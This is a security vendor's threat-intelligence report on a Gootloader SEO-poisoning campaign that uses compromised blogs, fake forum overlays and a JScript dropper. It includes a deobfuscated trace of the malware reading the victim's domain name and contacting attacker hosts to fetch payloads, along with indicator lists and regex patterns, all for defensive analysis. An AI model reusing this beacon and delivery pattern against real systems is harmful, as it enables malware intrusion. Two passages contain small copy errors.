THREAT ACTIVITY INTEL REPORT ## Is Gootloader Working with a Foreign Intelligence Service? ###### Authors: Eric Ford & Ben Nichols ----- ###### In late August, Deepwatch’s Adversary Tactics and Intelligence (ATI) group responded to a customer incident highly likely associated with Gootloader threat actors using the search engine optimization (SEO) poisoning technique. Our findings suggest the campaign may have foreign intelligence service influence through analysis of the blog post subjects. The threat actors used blog post titles that an individual would search for whose organization may be of interest to a foreign intelligence service e.g. “Confidentiality Agreement for Interpreters.” The Threat Intel Team discovered the threat actors highly likely created 192 blog posts on one site. These blog posts cover topics relevant to government, legal, healthcare, real estate, and education. Several blog posts are related to business and real estate transactions in US states like California, Washington, and Wisconsin; while others cover topics relevant to Australia, Canada, New Zealand, the United Kingdom, the United States, and other countries. You can read how Deepwatch approaches cyber threat intelligence here. ###### EXECUTIVE SUMMARY ----- ###### KEY FINDINGS **• The campaign appears to have foreign** ###### intelligence service influence. We discovered that many blog posts use keywords that an individual would search for whose organization may be of interest to foreign intelligence services. **• TAC-011 highly likely created almost 200** ###### blog posts on one site with topics ranging from government, finance, education, and healthcare to real estate, legal, and transportation. **• The threat actors created the blog** ###### posts with relevant content pieced together from multiple sources, spending considerable time and effort researching and developing the content for each blog post. **• It is estimated that TAC-011 has likely** ###### compromised hundreds of WordPress websites and may have produced thousands of individual blog posts. **• TAC-011 likely utilizes a central server** ###### that all compromised sites use to pull content from and log the visitor’s IP address and device OS. ----- # Table of Contents #### Is Gootloader Working With a Foreign Intelligence #### Service? ###### SEO Poisoning...........................................................................5 TAC-011 & Gootloader................................................................5 TAC-011 Campaign Analysis.......................................................6 A Deeper Dive Into the Blog....................................................9-15 **• Blog Post: Bilateral Air Service Agreement** **• Blog Post: Ip in Government Contracts** **• Blog Post: Sco Agreement on Mass Media Cooperation** **• Blog Post: What Is the Full Form of B O D M a S** ###### Observed Activity................................................................16-22 **• Initial Access** **• JScript Analysis** **• Targeting** ###### What You Need to Do................................................................22 **• Tactical and Operational Defensive Guidance** **• Strategic Defensive Guidance** ###### MITRE ATT&CK........................................................................23 Observables.............................................................................23 ----- ### SEO Poisoning ###### Threat actors use SEO poisoning techniques on compromised websites or pages they create to appear prominently in search results. The sites may contain content that many people are likely to use in searches at any given time, such as phrases related to holidays, trending news, or viral videos. However, threat actors can be very specific with their content to target a certain group. ###### One way to think about SEO poisoning is like setting a mouse trap and waiting for the mouse to take the bait. Once the victim (mouse) finds the trap, the fake forum (cheese) lures the victim into taking the bait. SEO poisoning contrasts with the more prevalent initial access vectors like phishing or exploiting internet-facing systems, which require the threat actor to find vulnerable targets. TAC-011 & Gootloader _On August 25th, Deepwatch’s Adversary Tactics and Intelligence (ATI) group responded to a customer incident_ _involving the victim’s employee searching Google for specific keywords related to transition service agreements._ _The user clicked on one of the search results titled, “Accounting for Transition Services Agreement | Sportrecs_ _Blog”, which appeared as a forum post with a link to an innocuous file the user had searched for. In reality, the file_ _was a malicious JScript (.js) file._ _The Deepwatch Threat Intel Team tracks the threat activity cluster observed in this incident as TAC-011, which_ _employs SEO poisoning techniques to infect machines with various payloads. This variation involves TAC-011_ _compromising legitimate websites, creating fake blog posts, and using overlays to display a fake forum page over_ _these blog posts. Additionally, the threat actors use obfuscated JavaScript to avoid detection and analysis of the_ _fake forum._ **[The Gootloader malware, first described by Sophos in March 2021, follows the same tactics and techniques](https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/)** **observed in this incident.** ###### Analyst Assessment 1 **The threat actor(s) behind the Gootloader malware, tracked as TAC-011, are highly likely responsible for** **this incident. The Threat Intel Team bases this assessment on the URLs found in the JScript file, the tactics,** **techniques, and procedures (TTPs) used, and the fake forum’s overall design and format.** ----- **_TAC-011 Diamond Model of Intrusion Analysis._** ###### TAC-011 Campaign Analysis **The Deepwatch Threat Intel Team examined blog.sportrecs[.]com and the blog post “Accounting for Transition** **Service Agreement,” as we knew that was the blog post that could result in Gootloader dropping additional** **[payloads on an unsuspecting visitor. At the time, sportrecs[.]com came up as benig in VirusTotal, and according to](https://www.virustotal.com/gui/domain/sportrecs.com/details)** **VirusTotal, the “Popularity Ranks” for the website range anywhere from 123,000 to 312,000 (figure 1).** **_Figure 1: Popularity rankings for sportrecs[.]com according to VirusTotal._** **According to VirusTotal’s (VT) whois lookup (figure 2), the site owners created it on 5 September 2019, last updated** **[it on 27 July 2022, and registered it with GoDaddy. The resolving IP address site is 188.246.233[.]180 (VT link).](https://www.virustotal.com/gui/ip-address/188.246.233.180)** **[This IP also resolves the domains mooscle[.]com and ruvod[.]com (VT links), and both of these domains are](https://www.virustotal.com/gui/domain/mooscle.com)** **benign in VT as well.** ----- **_Figure 2: VirusTotal Whois lookup for sportrecs[.]com._** **The site has the capability to translate blog posts into four different languages (English, Portuguese, Hebrew, and** **Russian). We learned that the suspicious blog posts are translated into only three of the four languages (English,** **Portuguese, and Hebrew).** **Visiting the blog.sportrecs[.]com, visitors are presented with blog posts that one would expect to find on a sports** **streaming distribution site (Figures 3 & 4).** ----- **Next, we tried to find out if there were other suspicious** **blog posts on the site. To our surprise, our investigation** **revealed almost 200 suspicious blog posts. If threat** **actors employ SEO poisoning techniques, they may** **appear in top search results.** **The suspicious blog posts cover topics ranging from** **government, and legal to real estate, medical, and** **education. Some blog posts cover topics related to** **specific legal and business questions or actions for US** **states such as California, Florida, and New Jersey. Other** **blog posts cover topics relevant to Australia, Canada,** **New Zealand, the United Kingdom, the United States,** **and other countries.** ##### Analyst Assessment 2 **TAC-011 likely compromised blog.sportrecs[.]** **com website, given that all available** **information points to the site being legitimate.** **However, the means of compromise is** **unknown, and we cannot positively confirm** **that this site is legitimate.** **Furthermore, the threat actors highly likely** **created these blog posts, given that the** **content of these blog posts is out of place and** **off-topic for content that one would expect to** **find on a Sports streaming service provider.** **_Figure 3: New product updates posted on September 24, 2021._** **_Figure 4: Marketing-related blog post added on September 23, 2021._** ----- ##### A Deeper Dive Into the Blog **From our analysis of these blog posts, we learned that they are not filled with gibberish, but are pieced together from** **multiple sources. This suggests that TAC-011 has the resources and time to accomplish this task.** **What is not known is how many actors comprise TAC-011. Given the herculean task of researching and creating** **hundreds of blog posts, one may assume that many individuals are working together. However, this task may not be** **completely unfeasible for a lone individual despite the perceived level of effort needed to do this.** **During our review of these blog posts we looked at the number of posts that featured keywords like agreement,** **contract, legal, etc. The chart below (figure 5) shows our findings and the threat actor’s preference for the word** **“agreement.”** **_Figure 5: Chart displaying the number of blog posts with specific words._** **“agreement.”** ----- **We also looked at the number of posts on specific topics. The chart below (figure 6) shows that most blog posts** **are of general business in nature and could target any industry. Furthermore, 40% of the blog posts cover topics** **that are relevant to the professional, scientific, and technical services; real estate, rental, and leasing; finance and** **insurance; transportation and warehousing; educational services; and healthcare and social assistance industries.** **_Figure 6: Chart displaying the number of blog posts with subjects relevant to a specific sector._** ----- ----- ###### In the following sections, we examine four unique blog posts to highlight how TAC-011 can target very specific groups. ##### Blog Post: Bilateral Air Service Agreements **The blog post “Bilateral Air Service Agreements” (figure 8), posted on January 30, 2022, explains a bilateral** **agreement concerning civil aviation products imported and exported between two countries.** **_Figure 8: Bilateral service agreements blog post added on January 30, 2022._** **An end-user may search for this information if the organization the employee works for manufactures civil aviation** **products. This information may also interest college students, government officials, and employees.** **These data points suggest that possible sectors targeted include: education, government, and government Figure 5: Chart displaying the number of blog posts with specific words.** **contractors.** ----- ##### Blog Post: Ip in Government Contracts **The blog post “Ip in Government Contracts” (figure 9), posted on January 30, 2022, explains a bilateral agreement** **concerning civil aviation products imported and exported between two countries.** **_Figure 9: Intellectual property blog post added on February 20, 2022._** **Conventional government contract clauses govern IP rights, which are mandated by law when created or used as** **part of a government contract. In certain situations, the government may enforce exclusive IP conditions that apply** **to a particular contract. In any case, the conditions of government contracts provide a broad range of results in** **terms of IP ownership and use.** **An end-user may search for this if they work for a company with government contracts and are concerned about** **losing IP rights, including rights to computer software programs and patents.** **These data points suggest that possible targeted sectors include government and government contractors.** ----- ##### Blog Post: Sco Agreement on Mass Media Cooperation **The blog post “Sco Agreement on Mass Media Cooperation” (figure 10), posted on March 29, 2022, explains the** **Shanghai Cooperation Organization agreement on Mass Media.** **_Figure 10: The mass media cooperation blog post added on March 29, 2022._** **The Shanghai Cooperation Organization comprises eight member states: China, Kazakhstan, Kyrgyzstan, Russia,** **Tajikistan, Uzbekistan, India, and Pakistan, and primarily involves agreements and activities relating to political,** **economic, security and military, and cultural cooperation.** **The mass media cooperation agreement, signed in June 2019, provides an opportunity for all the Member States to** **share innovations and best practices in the field of Mass Media.** **The eight-member states agreed on the following topics:** **• Creating a system for the mutual and wide distribution of information.** **• The cooperation among the Editorial Offices of the Mass Media and the relevant Ministries, Agencies, and Organizations** **in the field of Mass Media.** **• The promotion of equal and mutually beneficial cooperation between professional associations of journalists of the States,** **aiding broadcast of television and radio programs and those distributed legally within the territory of the State.** **• Encouraging the exchange of specialists and experience in the field of Mass Media, offering mutual assistance in training** **media professionals, and promoting cooperation between scientific research and educational institutions in the area of** **Mass Media.** **This information may be relevant to organizations involved with mass media in any of the eight-member states,** **international relations, or mass media in general. Also, this information would interest those studying international** **relations or foreign affairs.** **These data points suggest that possible targeted sectors include: information, education, and government.** ----- ##### Blog Post: What Is the Full Form of B O D M a S **The blog post titled “What Is the Full Form of B O D M a S” (figure 11), posted on April 17, explains a technique** **taught to students to memorize the order of mathematical operations.** **BODMAS is an acronym for Bracket Of** **Division, Multiplication, Addition, and** **Subtraction. It was created to aid kids in** **remembering the correct sequence to carry** **out mathematical operations while solving** **problems.** **This blog post is a perfect example of how** **SEO poisoning can be very effective. As you** **can see from the below screenshot (figure** **12), the threat actor’s blog post is the top** **result when searching for B O D M a S.** **This information may be relevant to teachers,** **teacher aids, parents, etc., during classroom** **instruction. College students studying early** **childhood education may also find this** **information relevant.** **These data points suggest that possible** **targets include the education sector,** **students, and parents.** **_Figure 11: B O D M a S blog post added on April 17, 2022._** ##### Analyst Assessment 4 **We estimate that TAC-011 has likely** **compromised hundreds of sites and** **may have produced thousands of** **individual blog posts. The Threat** **Intel Team bases this estimate on the** **effort needed to research topics, find** **content, and create the blog posts** **and the time and effort to identify and** **compromise those sites. .** **_Figure 12: Google search for B O D M a S returns the threat actor’s blog post_** _as the top result._ ----- ##### Observed Activity Initial Access **_TAC-011 Delivery and Infection Activity_** **The intrusion started on August 25 when an employee searched Google for “Transition services agreement” and** **“accounting for transition services agreement.” The user clicked on one of the search results (figure 13), ultimately** **[redirecting them to a fake forum [T1189].](https://attack.mitre.org/techniques/T1189/)** **_Figure 13: Google search result for the malicious blog post_** **[During our analysis of blog.sportrecs[.]com [T1584.001], we observed evidence of a script that we assess (Analyst](https://attack.mitre.org/techniques/T1584/001/)** **Assessment 5) conducts visitor verification. Due to this script’s server-side nature, we cannot definitively assess** **how TAC-011 decides which visitors should or should not see the fake forum. However, there is evidence that** **suggests the backend completes these validation checks.** **The following screenshot references a server-side script (Figure 14). Due to the server-side nature of the script, we** **cannot evaluate its contents.** **_Figure 14: Reference to a server-side script that is assessed to conduct the site visitor verification process._** ----- **Figures 15 and 16 show different responses based on the verification process performed by the threat actors. For** **example, figure 15 shows the response if the visitor passes the verification process, displaying the fake forum. On** **the other hand, figure 16 shows no response, which causes nothing to be overlaid on the innocuous blog post if the** **visitor fails the verification.** **_Figure 15: Response if the site visitor passes the verification process._** ----- ##### Analyst Assessment 5 **_Figure 16: Response if the site visitor fails the verification process._** **Based on web traffic analysis and the responses generated, the Threat Intel Team assesses that TAC-011 likely uses** **the script accepting the argument “a588126=2112527” for the verification process and returning or not returning the** **obfuscated overlay content.** **Furthermore, we have observed the file pattern of 7 character parameter = 7 character value (“a588126=2112527”) across** **the compromised sites we discovered, resulting in the same obfuscated responses.** **To determine what factors TAC-011 uses to verify site visitors and display the fake forum, the Threat Intel Team conducted** **several tests. Our tests included using various browsers and search engines and changing our external IP address.** **The Threat Intel Team also tested whether the threat actors would serve the fake forum to a visitor on one compromised site, and** **subsequently serve it again to the same visitor on another.** **The results appeared to indicate that visiting one of the compromised sites would allow the fake forum to be displayed once** **but not on any other compromised sites that the same visitor subsequently visited (within around a 24 hour timeframe). Testing** **also appeared to support the theory that these sites prevented visitors from common VPN, Tor, or other anonymizing external IP** **addresses and/or non-Windows systems from loading the malicious blog post overlay containing the download delivery link.** **The behavior detailed above suggests that the threat actors may employ a system that verifies if the same user (likely identified** **by their external IP address per the Threat Intel Team’s testing) is attempting to visit multiple compromised sites. Using a system** **like this, the threat actors can avoid discovery and data collection around the infrastructure used to deliver the malware and the** **details of the malware itself.** ##### Analyst Assessment 6 **Tests reveal that TAC-011 likely does not verify the visitor’s search engine but instead checks the visitor’s external IP** **address, confirms whether the device is running Windows, and verifies the last time the visitor viewed the site. By checking** **the IP address, OS, and last visited time, the threat actors can prevent security researchers from identifying additional** **compromised sites and ensure the malware remains accessible to potential victims.** **Furthermore, our findings suggest that TAC-011 employs a central server that all compromised sites check into that logs** **the visitor’s IP address, device OS, and the last visited time. The threat actors likely log additional details, but it does not** **appear the threat actors use these for verification.** **[Once the site visitor passes these validation checks, code (figure 17) builds an overlay [T1059.007] and places it over the](https://attack.mitre.org/techniques/T1059/007/)** **innocuous blog post.** **_Figure 17: Obfuscated script to build overlay for the forum._** ----- **The forum shows a user named “Emma Hill” asking** **for an “accounting for transitions agreement” to** **download. An “Admin,” responding to the request,** **provided a link to download the requested document** **(figure 18).** **This fake forum design is not new and was first** **[reported in March 2021 by Sophos (figure 19) and](https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/)** **[observed again in May 2022 in a DFIR Report video](https://youtu.be/IdR-tlv7w48)** **(figure 20) posted on YouTube and shared on their blog** **[post titled “SEO Poisoning – A Gootloader Story.”](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)** **_Figure 19: Fake forum design reported by Sophos in March 2021._** **_Figure 18: Fake forum with a link to the malicious document._** **_Figure 20: Fake forum design reported by the DFIR Report in May 2022._** **[In this incident, the user clicked on the link [T1204.001] (rochias[.]com/download.](https://attack.mitre.org/techniques/T1204/001/)** **php?fwblgs=wspqzbn&mifteuofwghftm=38a40d915d4f7b96f5d6f270ae10c3ce4ddfb06c0d847ccf805249d9e641112665b6d6a7** **afacb51c72eda8540f869084&aspdmrimz=uliljt) shared by the “Admin,” downloading a zip archive containing a malicious JScript** **[file [T1059.007] titled Accounting_for_transition_services_agreement (tfxp).js (figure 21). We also discovered that TAC-011](https://attack.mitre.org/techniques/T1059/007/)** **changes the domain hosting of the Gootloader malware JScript file.** ##### Analyst Note 1 _The Threat Intel Team has observed the threat actors using various download delivery domains and the same_ _download.php naming pattern (/download.php?*=*=*=*) across all compromised sites_ _we discovered._ **The user’s machine had an EDR solution deployed, blocking the file execution and** **preventing follow-on malware from being dropped on the user’s device.** **_Figure 21: Contents of the Zip archive._** ----- ##### Javascript Analysis **[The .js file is assessed as Gootloader based on open-source reporting (figure 22) of websites attributed to](https://twitter.com/nosecurething/status/1561889613102415873?s=20&t=PSSpZzPQzP3ADbIvchZUBg)** **[Gootloader and serving second-stage payloads [T1105]. The threat actors obfuscated [T1027] the file and](https://attack.mitre.org/techniques/T1105/)** **attempted to contact one of three domains.** **_Figure 22: Twitter post from Matt Anderson (@nosecurething) observables related to Gootloader._** ``` IHost.CreateObject(“MSXML2.ServerXMLHTTP”); IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]lovlr[.]com/test[.]php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); IHost.CreateObject(“MSXML2.ServerXMLHTTP”); IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]lovlr[.]com/test[.]php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); IServerXMLHTTPRequest2.status(); IServerXMLHTTPRequest2.responseText(); IHost.Sleep(“23232”); IHost.CreateObject(“MSXML2.ServerXMLHTTP”); IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]lukeamiller[.]net/test[.] php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); IHost.CreateObject(“MSXML2.ServerXMLHTTP”); ``` ----- ##### Javascript Analysis (continued) ``` IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]lovlr[.]com/test[.]php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); IServerXMLHTTPRequest2.status(); IServerXMLHTTPRequest2.responseText(); IHost.Sleep(“23232”); IHost.CreateObject(“MSXML2.ServerXMLHTTP”); IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]lukeamiller[.]net/test[.] php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); IServerXMLHTTPRequest2.status(); IServerXMLHTTPRequest2.responseText(); IHost.Sleep(“23232”); IHost.CreateObject(“MSXML2.ServerXMLHTTP”); IHost.CreateObject(“WScript.Shell”); IWshShell3.ExpandEnvironmentStrings(“%USERDNSDOMAIN%”); IServerXMLHTTPRequest2.open(“GET”, “https://www[.]luckies[.]cc/test[.]php?ddnmoqobaebybam=[0-9]+”, “false”); IServerXMLHTTPRequest2.send(); ``` **Deobfuscated output of Accounting_for_transition_services_agreement (tfxp).js. Note: URLs and timestamps have** **been sanitized.** **The environment variable “%USERDNSDOMAIN%,” which returns a fully qualified domain name (FQDN) of** **the compromised system, will allow the threat actor(s) the ability to identify which organization they have gained** **access to.** **When Deepwatch attempted to contact these domains, the responses returned nothing, so we are unsure what** **second-stage payload would have dropped on the end-point.** ##### Analyst Assessment 7 **The Threat Intel Team assesses that the “%USERDNSDOMAIN%” variable likely sends back the corporate** **domain name (“company.com”). So, for example, if a company with a Windows Active Directory environment** **and a computer logged into the organization’s network were compromised, the adversary would know that** **they have access to that organization. At this point, the threat actor could sell access or drop another post-** **exploitation tool like Cobalt Strike and move laterally in the environment.** ##### Targeting **The user searched for transition service agreements (TSAs). Numerous companies use these agreements across** **various industries during mergers and acquisitions.** **TSAs help facilitate a smooth administrative transition following the sale of a portion of an organization. The selling** **firm offers a package of services to the acquiring company for a predetermined time. These services include HR, IT,** **accounting, finance, and other necessary infrastructure requirements.** **As various organizations across numerous industries use TSAs, this campaign will likely target multiple industries.** ----- ##### What You Need to Do TACTICAL AND OPERATIONAL DEFENSIVE GUIDANCE **Employees should be trained on this tactic and instructed to spot the telltale signs that they are visiting a fake** **website. Training should also include identifying potentially malicious file extensions, such as *.js, and the format** **and style of the phony forum (figure 18), which organizations can share with their employees.** **Organizations should change file associations via Group Policy, so a text editor is used to open risky file extensions** **instead of the default Microsoft Windows Based Script Host program.** **Changing file associations can be accomplished through the Group Policy Management Editor and changing the** **folder options “open with” settings to have specific file extensions open with an organization-approved text editor.** **Organizations are encouraged to change the file associations for the following file extensions .js, .vbs, .vbe, .jse,** **.hta, and .wsf.** **This mitigation measure will ensure that the execution of these files when users double-click them does not occur,** **as the execution of these files is abnormal in everyday business operations.** **Website owners should ensure that their CMS platforms, like WordPress, are up to date and are deploying a web** **application firewall. In addition, organizations should monitor their blogs for unknown content and, if found, remove** **it. Also, organizations should monitor scripts and verify that they have not changed. One common access vector for** **threat actors is brute forcing the admin password, ensuring the admin account default credentials are changed, and** **implementing MFA may reduce this attack vector.** STRATEGIC DEFENSIVE GUIDANCE **TAC-011 uses the same forum format reported multiple times since March 2021 and utilized the same tactics** **and techniques. The reuse of these techniques indicates that they remain effective and demonstrates how simple** **social engineering techniques can deceive end-users. By anticipating what people will search for and using SEO** **techniques, TAC-011 can target vast swathes of entire regions or narrow its focus to specific interest groups or** **industries.** **One possible reason that employees may turn to the web to find the templates they need is that they do not** **believe or know that these templates may be available through official company resources. Ensuring that potential** **templates are available and employees know how to access them may reduce the risk of this threat.** **Furthermore, having a process where an employee can request specific templates may reduce their need to search** **for the templates and thus fall victim to these tactics. Finally, with proper awareness training, end users can avoid** **downloading malicious files if they recognize the signs.** ----- ##### MITRE ATT&CK **ATT&CK ID** **DESCRIPTION** **T1587.001** **Develop Capabilities: Malware** **T1584.001** **Compromise Infrastructure: Domains** **T1189** **Drive-by Compromise** **T1204.001** **User Execution: Malicious Link** **T1059.007** **Command and Scripting Interpreter: JavaScript** **T1027** **Obfuscated Files or Information** **T1105** **Ingress Tool Transfer** ##### Observables **Note** _Observables are properties (such as an IP address, MD5 hash, or the value of a registry key) or measurable events (such as_ _the creation of a registry key or a user) and are not indicators of compromise. The observables listed below provide contextual_ _information only. Deepwatch evaluates the observables and applies those it deems appropriate to our detections._ _You should investigate further if you observe sets of these observables. For instance, observing an IP address, creating a user with_ _admin privileges, and creating a registry key._ |Description|Value|Col3| |---|---|---| |Blog Post created by TAC-011:|blog.sportrecs[.]com/en/2022/01/22/accounting-for-transition-services-agreement/|| |Link in the fake forum that hosts the Gootloader malware. Note: We discovered that the threat actors change this often.|rochias[.]com/download.php?fwblgs=wspqzbn&mifteuofwghftm=38a40d915d4f7b96f5d- 6f270ae10c3ce4ddfb06c0d847ccf805249d9e641112665b6d6a7afacb51c72e- da8540f869084&aspdmrimz=uliljt|| |Gootloader malware JScript file|File Name: Accounting_for_transition_services_agreement (tfxp).js SHA256 Hash: 891b849997f783ce6e6c8720b4bd07f169b2eac4cbc11b78cfadd62ea5c9442c|| |Hard-coded domains in Gootloader JScript files (in the form of a regex pattern)|ovlr[.]com\/test[.]php[?][a-z]{13,16}=[0-9]{13,16} lukeamiller[.]net\/test[.]php[?][a-z]{13,16}=[0-9]{13,16} luckies[.]cc/test.php\/test[.]php[?][a-z]{13,16}=[0-9]{13,16} macromixenlinea[.]com\/test[.]php[?][a-z]{13,16}=[0-9]{13,16}|| |Domains discovered hosting malicious JScript file|quickprint[.]nl probis[.]com[.]pl psychanalyste-toulouse[.]fr porconocer[.]com rochias[.]com|proficomarket[.]com[.]ua psychotherapie-schmitt[.]de rohmert-medien[.]de rockharz-festival[.]com| |Other domains identified hardcoded in Gootloader JScript|macromixenlinea[.]com/test.php?zncirdcyaeauch=[0-9]+|| ----- ###### ABOUT DEEPWATCH **Deepwatch is the leader in managed security services,** **protecting organizations from ever-increasing cyber** **threats 24/7/365. Powered by Deepwatch’s cloud-** **based security operations platform, Deepwatch** **provides the industry’s fastest, most comprehensive** **detection and automated response to cyber threats** **together with tailored guidance from dedicated experts** **to mitigate risk and measurably improve security** **posture. Hundreds of organizations, from Fortune 100** **to mid-sized enterprises, trust Deepwatch to protect** **their business.** **Visit www.deepwatch.com to learn more.** ###### CONTACT US **4030 W Boy Scout Blvd, Suite 550** **Tampa, FL 33607** **(855) 303-3033** -----